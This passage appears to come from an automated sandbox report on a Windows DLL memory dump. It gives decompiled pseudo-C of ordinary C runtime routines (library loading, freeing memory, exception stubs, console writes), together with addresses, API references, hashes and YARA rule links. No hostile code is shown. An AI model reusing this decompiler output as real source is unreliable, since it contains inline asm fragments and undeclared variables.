						asm("cdq");
						 *0x6e21304c = _t45 + 1;
						E6E19D5E5(__ebx, _t58, __edi, _t58, _t26 - 0x2f, __edx);
					}
				} else {
					E6E19D50F(_t58, 1);
				}
				return E6E199EE7(_v8 ^ _t59);
			}

0x6e1a0662
0x6e1a0669
0x6e1a066c
0x6e1a0673
0x6e1a0676
0x6e1a067a
0x6e1a068c
0x6e1a06b2
0x6e1a06bb
0x6e1a06bc
0x6e1a070a
0x6e1a070a
0x6e1a0712
0x6e1a0722
0x6e1a0724
0x6e1a072b
0x6e1a072e
0x6e1a0714
0x6e1a0719
0x6e1a071e
0x6e1a071e
0x6e1a0731
0x6e1a0736
0x6e1a06be
0x6e1a06c5
0x6e1a06cb
0x6e1a06ce
0x6e1a0703
0x00000000
0x6e1a0705
0x6e1a0705
0x00000000
0x6e1a0705
0x6e1a06d0
0x6e1a06d0
0x6e1a06d3
0x6e1a06d5
0x6e1a06e3
0x6e1a06eb
0x6e1a06f4
0x6e1a06f8
0x6e1a06f8
0x6e1a06ce
0x6e1a0692
0x6e1a0699
0x6e1a069b
0x6e1a06a4
0x6e1a06a4
0x6e1a067c
0x6e1a0680
0x6e1a0680
0x6e1a0747

APIs

DName::DName.LIBVCRUNTIME ref: 6E1A0680
DName::DName.LIBVCRUNTIME ref: 6E1A06A4

Strings

%lf, xrefs: 6E1A06D8
A, xrefs: 6E1A06FF

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: NameName::
String ID: %lf$A
API String ID: 1333004437-43661536
Opcode ID: 8843f4b682c32c9a036049dd778bf9e7195998db888d3fc00e7a70ebd7086a61
Instruction ID: 76f0a5d41f498b275ad5ccbdcd47f1905a7be3f98ddfbef96e29049031654e0e
Opcode Fuzzy Hash: 8843f4b682c32c9a036049dd778bf9e7195998db888d3fc00e7a70ebd7086a61
Instruction Fuzzy Hash: B331AEB8904208AFDF10DFE9C815AEDBBB9BF09308F01445EE2959B240DBB49985EF11

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B15F6, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B15F6(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6e213400 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6e205cb0 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6E1B0F58(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6E1B0F58(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x6e1b15ff
0x6e1b16a9
0x6e1b1607
0x6e1b1609
0x6e1b1610
0x6e1b1612
0x6e1b1618
0x6e1b1625
0x6e1b163a
0x6e1b163e
0x6e1b1690
0x6e1b1690
0x6e1b1695
0x6e1b1699
0x6e1b169c
0x6e1b169c
0x6e1b16a2
0x6e1b16a4
0x6e1b16b9
0x6e1b16b4
0x6e1b16b8
0x6e1b16b8
0x6e1b16a6
0x6e1b16a6
0x00000000
0x6e1b16a6
0x6e1b1640
0x6e1b1649
0x6e1b1680
0x6e1b1680
0x6e1b1682
0x6e1b1684
0x00000000
0x00000000
0x6e1b168c
0x00000000
0x6e1b168c
0x6e1b1653
0x6e1b1658
0x6e1b165d
0x00000000
0x00000000
0x6e1b1667
0x6e1b166c
0x6e1b1671
0x00000000
0x00000000
0x6e1b1676
0x6e1b167c
0x00000000
0x6e1b167c
0x6e1b161d
0x00000000
0x00000000
0x00000000
0x6e1b1623
0x6e1b16b2
0x00000000

Strings

ext-ms-, xrefs: 6E1B1661
api-ms-, xrefs: 6E1B164D

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 48aa0becfdc54504b008da157c1e316932c2afe700ba19788a5be2641b235029
Instruction ID: a22b6e66f2928ed26e1faef0c4884b91a4b63c01a601bfcadf12452695cf741b
Opcode Fuzzy Hash: 48aa0becfdc54504b008da157c1e316932c2afe700ba19788a5be2641b235029
Instruction Fuzzy Hash: 12213D72F51611EBCB518AE68C48B8B376DAF667A0F2B0514EC35A72C2D6B0DC44D5F0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C1208, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1C1208(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6E1C0EF3(_t45, 7);
					E6E1C0EF3(_t45 + 0x1c, 7);
					E6E1C0EF3(_t45 + 0x38, 0xc);
					E6E1C0EF3(_t45 + 0x68, 0xc);
					E6E1C0EF3(_t45 + 0x98, 2);
					E6E1B110D( *((intOrPtr*)(_t45 + 0xa0)));
					E6E1B110D( *((intOrPtr*)(_t45 + 0xa4)));
					E6E1B110D( *((intOrPtr*)(_t45 + 0xa8)));
					E6E1C0EF3(_t45 + 0xb4, 7);
					E6E1C0EF3(_t45 + 0xd0, 7);
					E6E1C0EF3(_t45 + 0xec, 0xc);
					E6E1C0EF3(_t45 + 0x11c, 0xc);
					E6E1C0EF3(_t45 + 0x14c, 2);
					E6E1B110D( *((intOrPtr*)(_t45 + 0x154)));
					E6E1B110D( *((intOrPtr*)(_t45 + 0x158)));
					E6E1B110D( *((intOrPtr*)(_t45 + 0x15c)));
					return E6E1B110D( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6e1c120e
0x6e1c1213
0x6e1c121c
0x6e1c1227
0x6e1c1232
0x6e1c123d
0x6e1c124b
0x6e1c1256
0x6e1c1261
0x6e1c126c
0x6e1c127a
0x6e1c1288
0x6e1c1299
0x6e1c12a7
0x6e1c12b5
0x6e1c12c0
0x6e1c12cb
0x6e1c12d6
0x00000000
0x6e1c12e6
0x6e1c12eb

APIs

Part of subcall function 6E1C0EF3: _free.LIBCMT ref: 6E1C0F18

_free.LIBCMT ref: 6E1C1256

Part of subcall function 6E1B110D: HeapFree.KERNEL32(00000000,00000000,?,6E1C0F1D,?,00000000,?,A1724430,?,6E1C1221,?,00000007,?,?,6E1BC966,?), ref: 6E1B1123
Part of subcall function 6E1B110D: GetLastError.KERNEL32(?,?,6E1C0F1D,?,00000000,?,A1724430,?,6E1C1221,?,00000007,?,?,6E1BC966,?,?), ref: 6E1B1135

_free.LIBCMT ref: 6E1C1261
_free.LIBCMT ref: 6E1C126C
_free.LIBCMT ref: 6E1C12C0
_free.LIBCMT ref: 6E1C12CB
_free.LIBCMT ref: 6E1C12D6
_free.LIBCMT ref: 6E1C12E1

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5e49b3a29f6f9899a9425d283053ab0b9ce8d16d7e36f9da9cdb6741a7a4f9bd
Instruction ID: 19b42a82d5ebc6a1a03bb596f7c21a37932560395c31ae5e25c13d8078e89194
Opcode Fuzzy Hash: 5e49b3a29f6f9899a9425d283053ab0b9ce8d16d7e36f9da9cdb6741a7a4f9bd
Instruction Fuzzy Hash: 841136B1AC4B44B6D920E7F0CC05FCF77DCAF14B05F404C19A299E6450EB79B585A751

Uniqueness

Uniqueness Score: -1.00%

Function 6E199E41, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E6E199E41(char _a4) {
				char _v16;
				intOrPtr _v24;
				char _v44;
				intOrPtr _v52;
				char _v72;
				intOrPtr _v80;
				char _v104;
				intOrPtr _v112;
				char _v132;
				void* _t43;
				void* _t44;
				void* _t45;

				_t44 = _t43 - 0xc;
				_t2 =  &_a4; // 0x6e202c0d
				E6E199BAE( &_v16,  *_t2);
				E6E19B94D( &_v16, 0x6e20fff0);
				asm("int3");
				_push(_t43);
				_t45 = _t44 - 0xc;
				E6E199C22( &_v44, _v24);
				E6E19B94D( &_v44, 0x6e21002c);
				asm("int3");
				_push(_t44);
				E6E199C5C( &_v72, _v52);
				E6E19B94D( &_v72, 0x6e210068);
				asm("int3");
				_push(_t45);
				E6E199C9F( &_v104, _v80);
				E6E19B94D( &_v104, 0x6e2100f8);
				asm("int3");
				_push(_t45 - 0xc);
				E6E191410( &_v132, _v112);
				E6E19B94D( &_v132, 0x6e2100a4);
				asm("int3");
				return "bad function call";
			}

0x6e199e44
0x6e199e4a
0x6e199e4d
0x6e199e5b
0x6e199e60
0x6e199e61
0x6e199e64
0x6e199e6d
0x6e199e7b
0x6e199e80
0x6e199e81
0x6e199e8d
0x6e199e9b
0x6e199ea0
0x6e199ea1
0x6e199ead
0x6e199ebb
0x6e199ec0
0x6e199ec1
0x6e199ecd
0x6e199edb
0x6e199ee0
0x6e199ee6

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E199E4D

Part of subcall function 6E19B94D: RaiseException.KERNEL32(E06D7363,00000001,00000003,00000001,?,?,6E199E60,00000001,6E20FFF0,, n,A172442E,6E202C0D,?), ref: 6E19B9AD

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E199E6D
std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E199E8D
std::regex_error::regex_error.LIBCPMT ref: 6E199EAD

Part of subcall function 6E191410: ___std_exception_copy.LIBVCRUNTIME ref: 6E191439

Strings

bad function call, xrefs: 6E199EE1
, n, xrefs: 6E199E4A, 6E199E61

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: std::invalid_argument::invalid_argument$ExceptionRaise___std_exception_copystd::regex_error::regex_error
String ID: , n$bad function call
API String ID: 2176578266-1467493702
Opcode ID: 6555a84c16022e55c60663c133405293c5643acee2acd6971c6fcbcc66df2cba
Instruction ID: 15b2174f664d46d2a07124432e649cd318b29ccfc9d094d8d028703b4e70201a
Opcode Fuzzy Hash: 6555a84c16022e55c60663c133405293c5643acee2acd6971c6fcbcc66df2cba
Instruction Fuzzy Hash: 5F115E79C0410CBBCB04FBE4DC14DDDB7BEAE04204F804864AA2596144EB74AB5AE6D5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1BAA03, Relevance: 9.3, APIs: 6, Instructions: 318
fileCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E6E1BAA03(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				long _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				long _t235;
				struct _OVERLAPPED* _t243;
				signed int _t247;
				intOrPtr _t250;
				signed int _t253;
				signed int _t254;
				signed int _t256;
				struct _OVERLAPPED* _t257;
				intOrPtr _t259;
				void* _t263;
				long _t264;
				signed char _t265;
				signed int _t266;
				void* _t267;
				void* _t269;
				struct _OVERLAPPED* _t270;
				long _t271;
				signed int _t272;
				long _t276;
				signed int _t280;
				long _t281;
				struct _OVERLAPPED* _t282;
				signed int _t284;
				intOrPtr _t286;
				signed int _t289;
				signed int _t292;
				long _t293;
				long _t294;
				signed int _t295;
				intOrPtr _t296;
				signed int _t298;
				signed int _t300;
				void* _t301;
				void* _t303;

				_t298 = _t300;
				_t301 = _t300 - 0x8c;
				_t172 =  *0x6e212008; // 0xa172442e
				_v8 = _t172 ^ _t298;
				_t174 = _a8;
				_t264 = _a12;
				_t284 = (_t174 & 0x0000003f) * 0x38;
				_t247 = _t174 >> 6;
				_v112 = _t264;
				_v84 = _t247;
				_v80 = _t284;
				_t286 = _a16 + _t264;
				_v116 =  *((intOrPtr*)(_t284 +  *((intOrPtr*)(0x6e2134e0 + _t247 * 4)) + 0x18));
				_v104 = _t286;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E6E1A710E( &_v72, _t264, 0);
				asm("stosd");
				_t250 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t250;
				asm("stosd");
				asm("stosd");
				_t276 = _v112;
				_v40 = _t276;
				if(_t276 >= _t286) {
					L53:
					__eflags = _v60 - _t243;
				} else {
					_t289 = _v92;
					while(1) {
						_v47 =  *_t276;
						_v76 = _t243;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x6e2134e0 + _v84 * 4));
						_v52 = _t186;
						if(_t250 != 0xfde9) {
							goto L24;
						}
						_t266 = _v80;
						_t212 = _t186 + 0x2e + _t266;
						_t257 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t257)) != _t243) {
							_t257 =  &(_t257->Internal);
							if(_t257 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t280 = _v104 - _t213;
						_v44 = _t257;
						if(_t257 <= 0) {
							_t259 =  *((char*)(( *_t213 & 0x000000ff) + 0x6e2127b0)) + 1;
							_v52 = _t259;
							__eflags = _t259 - _t280;
							if(_t259 > _t280) {
								__eflags = _t280;
								if(_t280 <= 0) {
									goto L45;
								} else {
									_t293 = _v40;
									do {
										_t267 = _t266 + _t243;
										_t216 =  *((intOrPtr*)(_t243 + _t293));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t267 +  *((intOrPtr*)(0x6e2134e0 + _v84 * 4)) + 0x2e)) = _t216;
										_t266 = _v80;
										__eflags = _t243 - _t280;
									} while (_t243 < _t280);
									goto L44;
								}
							} else {
								_t281 = _v40;
								__eflags = _t259 - 4;
								_v144 = _t243;
								_t261 =  &_v144;
								_v140 = _t243;
								_v56 = _t281;
								_t219 = (0 | _t259 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L22;
							}
						} else {
							_t228 =  *((char*)(( *(_t266 + _v52 + 0x2e) & 0x000000ff) + 0x6e2127b0)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t257;
							_v52 = _t229;
							if(_t229 > _t280) {
								__eflags = _t280;
								if(_t280 > 0) {
									_t294 = _v40;
									do {
										_t269 = _t266 + _t243 + _t257;
										_t231 =  *((intOrPtr*)(_t243 + _t294));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t269 +  *((intOrPtr*)(0x6e2134e0 + _v84 * 4)) + 0x2e)) = _t231;
										_t257 = _v44;
										_t266 = _v80;
										__eflags = _t243 - _t280;
									} while (_t243 < _t280);
									L44:
									_t289 = _v92;
								}
								L45:
								_t292 = _t289 + _t280;
								__eflags = _t292;
								L46:
								__eflags = _v60;
								_v92 = _t292;
							} else {
								_t270 = _t243;
								if(_t257 > 0) {
									_t296 = _v108;
									do {
										 *((char*)(_t298 + _t270 - 0xc)) =  *((intOrPtr*)(_t296 + _t270));
										_t270 =  &(_t270->Internal);
									} while (_t270 < _t257);
									_t229 = _v52;
								}
								_t281 = _v40;
								if(_t229 > 0) {
									E6E1A42C0( &_v16 + _t257, _t281, _v52);
									_t257 = _v44;
									_t301 = _t301 + 0xc;
								}
								if(_t257 > 0) {
									_t271 = _v44;
									_t282 = _t243;
									_t295 = _v80;
									do {
										_t263 = _t295 + _t282;
										_t282 =  &(_t282->Internal);
										 *(_t263 +  *((intOrPtr*)(0x6e2134e0 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t282 < _t271);
									_t281 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t261 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L22:
								_push(_t220);
								_push( &_v76);
								_t222 = E6E1BBBC1(_t261);
								_t303 = _t301 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L53;
								} else {
									_t276 = _t281 + _v52 - 1;
									L32:
									_t276 = _t276 + 1;
									_v40 = _t276;
									_t193 = E6E1B925C(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t301 = _t303 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L53;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L52:
											_v96 = GetLastError();
											goto L53;
										} else {
											_t289 = _v88 - _v112 + _t276;
											_v92 = _t289;
											if(_v100 < _v56) {
												goto L53;
											} else {
												if(_v47 != 0xa) {
													L39:
													if(_t276 >= _v104) {
														goto L53;
													} else {
														_t250 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L52;
													} else {
														if(_v100 < 1) {
															goto L53;
														} else {
															_v88 = _v88 + 1;
															_t289 = _t289 + 1;
															_v92 = _t289;
															goto L39;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L54;
						L24:
						_t253 = _v80;
						_t265 =  *((intOrPtr*)(_t253 + _t186 + 0x2d));
						__eflags = _t265 & 0x00000004;
						if((_t265 & 0x00000004) == 0) {
							_v33 =  *_t276;
							_t188 = E6E1BA3B7(_t265);
							_t254 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t254 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t254 * 2)) >= _t243) {
								_push(1);
								_push(_t276);
								goto L31;
							} else {
								_t202 = _t276 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t272 = _v84;
									_t256 = _v80;
									 *((char*)(_t256 +  *((intOrPtr*)(0x6e2134e0 + _t272 * 4)) + 0x2e)) = _v33;
									 *(_t256 +  *((intOrPtr*)(0x6e2134e0 + _t272 * 4)) + 0x2d) =  *(_t256 +  *((intOrPtr*)(0x6e2134e0 + _t272 * 4)) + 0x2d) | 0x00000004;
									_t292 = _t289 + 1;
									goto L46;
								} else {
									_t206 = E6E1B2D75( &_v76, _t276, 2);
									_t303 = _t301 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L53;
									} else {
										_t276 = _v56;
										goto L32;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t253 + _t186 + 0x2e));
							_v23 =  *_t276;
							_push(2);
							 *(_t253 + _v52 + 0x2d) = _t265 & 0x000000fb;
							_push( &_v24);
							L31:
							_push( &_v76);
							_t190 = E6E1B2D75();
							_t303 = _t301 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L53;
							} else {
								goto L32;
							}
						}
						goto L54;
					}
				}
				L54:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t298;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6E199EE7(_v8 ^ _t298);
			}

0x6e1baa06
0x6e1baa08
0x6e1baa0e
0x6e1baa15
0x6e1baa18
0x6e1baa1d
0x6e1baa25
0x6e1baa28
0x6e1baa2c
0x6e1baa2f
0x6e1baa39
0x6e1baa43
0x6e1baa45
0x6e1baa48
0x6e1baa4b
0x6e1baa51
0x6e1baa53
0x6e1baa5a
0x6e1baa67
0x6e1baa68
0x6e1baa6b
0x6e1baa6e
0x6e1baa6f
0x6e1baa70
0x6e1baa73
0x6e1baa78
0x6e1bad84
0x6e1bad84
0x6e1baa7e
0x6e1baa7e
0x6e1baa81
0x6e1baa83
0x6e1baa89
0x6e1baa8c
0x6e1baa93
0x6e1baa9a
0x6e1baaa3
0x00000000
0x00000000
0x6e1baaa9
0x6e1baaaf
0x6e1baab1
0x6e1baab3
0x6e1baab6
0x6e1baabb
0x6e1baabf
0x00000000
0x00000000
0x00000000
0x6e1baabf
0x6e1baac4
0x6e1baac7
0x6e1baac9
0x6e1baace
0x6e1bab80
0x6e1bab81
0x6e1bab84
0x6e1bab86
0x6e1bad34
0x6e1bad36
0x00000000
0x6e1bad38
0x6e1bad38
0x6e1bad3b
0x6e1bad3e
0x6e1bad47
0x6e1bad4a
0x6e1bad4b
0x6e1bad4f
0x6e1bad52
0x6e1bad52
0x00000000
0x6e1bad56
0x6e1bab8c
0x6e1bab8c
0x6e1bab91
0x6e1bab94
0x6e1bab9a
0x6e1baba0
0x6e1baba9
0x6e1babac
0x6e1babac
0x6e1babad
0x6e1babae
0x6e1babb1
0x6e1babb2
0x00000000
0x6e1babb2
0x6e1baad4
0x6e1baae3
0x6e1baae4
0x6e1baae7
0x6e1baae9
0x6e1baaee
0x6e1bacff
0x6e1bad01
0x6e1bad03
0x6e1bad06
0x6e1bad0b
0x6e1bad14
0x6e1bad17
0x6e1bad18
0x6e1bad1c
0x6e1bad1f
0x6e1bad22
0x6e1bad22
0x6e1bad26
0x6e1bad26
0x6e1bad26
0x6e1bad29
0x6e1bad29
0x6e1bad29
0x6e1bad2b
0x6e1bad2b
0x6e1bad2f
0x6e1baaf4
0x6e1baaf4
0x6e1baaf8
0x6e1baafa
0x6e1baafd
0x6e1bab00
0x6e1bab04
0x6e1bab05
0x6e1bab09
0x6e1bab09
0x6e1bab0c
0x6e1bab11
0x6e1bab1d
0x6e1bab22
0x6e1bab25
0x6e1bab25
0x6e1bab2a
0x6e1bab2c
0x6e1bab2f
0x6e1bab31
0x6e1bab34
0x6e1bab37
0x6e1bab3a
0x6e1bab42
0x6e1bab46
0x6e1bab4a
0x6e1bab4a
0x6e1bab50
0x6e1bab56
0x6e1bab59
0x6e1bab61
0x6e1bab68
0x6e1bab6c
0x6e1bab6d
0x6e1bab70
0x6e1bab71
0x6e1babb5
0x6e1babb5
0x6e1babb9
0x6e1babba
0x6e1babbf
0x6e1babc5
0x00000000
0x6e1babcb
0x6e1babcf
0x6e1bac58
0x6e1bac5f
0x6e1bac67
0x6e1bac6f
0x6e1bac74
0x6e1bac77
0x6e1bac7c
0x00000000
0x6e1bac82
0x6e1bac97
0x6e1bad7b
0x6e1bad81
0x00000000
0x6e1bac9d
0x6e1baca6
0x6e1baca8
0x6e1bacae
0x00000000
0x6e1bacb4
0x6e1bacb8
0x6e1bacee
0x6e1bacf1
0x00000000
0x6e1bacf7
0x6e1bacf7
0x00000000
0x6e1bacf7
0x6e1bacba
0x6e1bacbc
0x6e1bacbe
0x6e1bacd7
0x00000000
0x6e1bacdd
0x6e1bace1
0x00000000
0x6e1bace7
0x6e1bace7
0x6e1bacea
0x6e1baceb
0x00000000
0x6e1baceb
0x6e1bace1
0x6e1bacd7
0x6e1bacb8
0x6e1bacae
0x6e1bac97
0x6e1bac7c
0x6e1babc5
0x6e1baaee
0x00000000
0x6e1babd6
0x6e1babd6
0x6e1babd9
0x6e1babdd
0x6e1babe0
0x6e1bac02
0x6e1bac05
0x6e1bac0a
0x6e1bac0e
0x6e1bac12
0x6e1bac40
0x6e1bac42
0x00000000
0x6e1bac14
0x6e1bac14
0x6e1bac17
0x6e1bac1a
0x6e1bac1d
0x6e1bad58
0x6e1bad5b
0x6e1bad68
0x6e1bad73
0x6e1bad78
0x00000000
0x6e1bac23
0x6e1bac2a
0x6e1bac2f
0x6e1bac32
0x6e1bac35
0x00000000
0x6e1bac3b
0x6e1bac3b
0x00000000
0x6e1bac3b
0x6e1bac35
0x6e1bac1d
0x6e1babe2
0x6e1babe9
0x6e1babee
0x6e1babf4
0x6e1babf6
0x6e1babfd
0x6e1bac43
0x6e1bac46
0x6e1bac47
0x6e1bac4c
0x6e1bac4f
0x6e1bac52
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1bac52
0x00000000
0x6e1babe0
0x6e1baa81
0x6e1bad87
0x6e1bad87
0x6e1bad89
0x6e1bad8c
0x6e1bad8c
0x6e1bad8c
0x6e1bad8c
0x6e1bad9e
0x6e1bada0
0x6e1bada1
0x6e1bada2
0x6e1badac

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6E1BAA4B
__fassign.LIBCMT ref: 6E1BAC2A
__fassign.LIBCMT ref: 6E1BAC47
WriteFile.KERNEL32(?,6E1B2316,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E1BAC8F
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E1BACCF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E1BAD7B

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 01c4070c041155ad50eeed84e1f005882ca0bcab450e0a0061f473ff52becfd2
Instruction ID: f8a0f8de65d768a445d5d9ee1949563eec20e129c9248c44cbe7267f58e242dd
Opcode Fuzzy Hash: 01c4070c041155ad50eeed84e1f005882ca0bcab450e0a0061f473ff52becfd2
Instruction Fuzzy Hash: 7BD1DE71D002899FCF15CFE8C9809EDBBB6FF49314F24416AE855BB241D730AA86DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AE93D, Relevance: 9.2, APIs: 6, Instructions: 221
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1AE93D(void* __ebx, intOrPtr* _a4) {
				signed short* _v0;
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _v20;
				signed short* _v40;
				intOrPtr _v52;
				intOrPtr* _v88;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t39;
				intOrPtr _t40;
				void* _t43;
				signed int _t47;
				signed int _t53;
				signed short _t54;
				signed int _t55;
				signed int _t56;
				void* _t59;
				void* _t61;
				intOrPtr _t62;
				intOrPtr* _t64;
				signed short _t68;
				signed int _t69;
				intOrPtr* _t70;
				intOrPtr* _t74;
				signed short* _t76;
				void* _t78;
				intOrPtr* _t80;
				intOrPtr* _t85;
				signed short* _t94;
				signed int _t96;
				void* _t97;
				signed int _t105;
				signed short* _t106;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				signed int _t113;
				void* _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
